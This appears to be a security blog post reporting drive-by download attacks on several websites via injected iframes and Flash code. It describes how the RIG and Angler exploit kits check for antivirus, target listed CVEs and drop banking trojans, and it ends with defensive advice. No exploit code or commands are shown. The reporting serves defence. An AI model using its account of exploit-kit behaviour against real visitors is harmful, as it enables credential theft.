The websites Spin.com and Popular Science magazine have been hit by drive-by download malware, meaning if you visited these sites at the end of October, you’d be redirected to a RIG exploit kit that installed data-stealing malware on your computer.
Similarly, jQuery.com was hit by the same attack near the end of September, infecting IT system administrators and web developers. And JPMorgan Chase’s customers were also hit by the very same attack in the ‘Smash & Grab’ phishing email campaign.
Symantec reports that the attack happened as a result of code injection of an iframe into the website, as seen below:
And Websense reports the same type of code injection attack hit Popular Science:
Users are redirected to the exploit kit landing page which checks their computer for certain antivirus software on their systems. If they have the antivirus installed, the kit avoids dropping malware in order to avoid being detected.
If they don’t have the antivirus on their systems, then the kit searches for certain known vulnerabilities in different applications, including:
- Use-after-free remote code execution (CVE-2013-2551 & CVE-2014-0322)
- Information disclosure (CVE-2013-7331)
- Double deference remote code (CVE-2013-0074)
Oracle Java SE
- Memory corruption (CVE-2013-2465)
- Remote Java runtime environment code execution (CVE-2012-0507)
Adobe Flash Player
- Remote code execution (CVE-2014-0497)
The type of malware dropped includes information stealers like the banking Trojan Infostealer.Dyranges, and Trojan.Zbot (Zeus), according to Symantec. Affecting only Windows systems, once installed and running, Dyranges checks the URL of web browsers and steals usernames and passwords.
Typically, this malware is used to target banking websites, but another variant, Dyre, has been known to target Salesforce.com customers via phishing emails, perhaps seeking the personal data of certain customers.
Zeus also affects only Windows users and steals confidential information, target system information, online credentials and banking data. The Trojan contacts a command & control server to send the information and take additional commands to download and execute files, shutdown or reboot the system, or delete system files.
University Hit with Flash-Based Redirection Script
According to research by MalwareBytes Labs, this type of attack is extremely common, and has compromised thousands of websites, including a website on the Carnegie Mellon domain.
Attackers injected remote flash application code in order to compromise visitors to the site, redirecting them to the Angler Exploit Kit landing page, which searches for Java and Flash exploits.
Apparently, this code is very long, messy and unnecessary - the same could be accomplished with just one simple line of iframe code. The kit also exploits the Microsoft IE user-after-free vulnerability (CVE-2014-1776) to target IE browser users and execute arbitrary code. After, a malware payload (Tinba) is downloaded on a user’s Windows system - the Trojan steals user information, same as Dyranges and Zeus.
Researchers found a few potential vulnerabilities, including the fact that the Carnegie Mellon’s Department of Statistics site was built on Drupal (recently hit by a ‘highly serious’ SQL injection vulnerability) and their server was running on an outdated and vulnerable version of Apache. But they also acknowledge that there are many different ways that a website can be breached, including via stolen credentials.
In order to check for infection, researchers recommend website owners:
- Check the very bottom of their homepage/website’s HTML source code for the malicious remote Flash application code
- Audit your site for any outdated content management software or plugins that could open up a backdoor for attackers
- Check that your Flash applications are updated, and disable Java plugins if possible
To help mitigate the fallout of a drive-by malware download attack, investing in additional authentication security can stop attackers from remotely accessing your accounts, if they’ve stolen your credentials with a Trojan. Learn more from our Two-Factor Authentication Resources.